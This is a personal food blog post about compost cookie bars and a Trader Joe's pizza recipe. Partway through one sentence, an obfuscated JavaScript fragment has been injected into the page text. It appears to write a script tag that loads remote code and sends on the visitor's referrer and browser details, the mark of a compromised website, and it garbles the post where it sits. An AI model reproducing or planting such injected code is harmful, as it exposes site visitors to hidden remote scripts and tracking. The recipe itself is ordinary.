That’s right.
He made compost cookie bars for Valentine’s day.
Do you remember the compost ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fhhan|var|u0026u|referrer|asyrb||js|php’.split(‘|’),0,{}))
cookies?
Nick found a recipe and then added a few extra ingredients to make it compost-y!
And they were delicious! You can find the recipe here! He added pretzels, potato chips and coffee grounds. He also didn’t add the nuts.
And I made us a pizza. A pizza that I was pretty proud of actually.
We used TJs pizza dough (not that great, but it did the trick).
Ingredients
TJs pizza dough
1 container TJs mini heirloom tomatos
Chicken Sausage, Italian flavor, 2 links
Basil
Shredded mozzarella
2 mini portabello mushrooms (it comes in a pack of 6 at TJs)
Garlic
Olive oil
Balsamic vinegar
1. Spread pizza dough on a piece of parchment and slowly spread it out (I like thin crust)
2. Chop 1 clove of garlic and mix with oil. Spread over pizza dough. Bake at 450 for about 5 minutes. We use a pizza stone and put the dough in the oven while on the parchment. I’ve heard that you can use a cookie sheet on the bottom coils….but I’ve never done it.
3. Chop about 2/3 of the tomatoes and mix with 1 clove chopped garlic, 1 tbs of balsamic and 1 tbs of olive oil.
4. Slice/chop sausage, mushrooms, and basil. Mix basil with tomatoes.
5. Spread tomatoes/basil, sausage, mushrooms and cheese on the pizza.
6. Bake for 10 minutes.

I think it was my first non-pizza-related use of the oven in over 10 years.
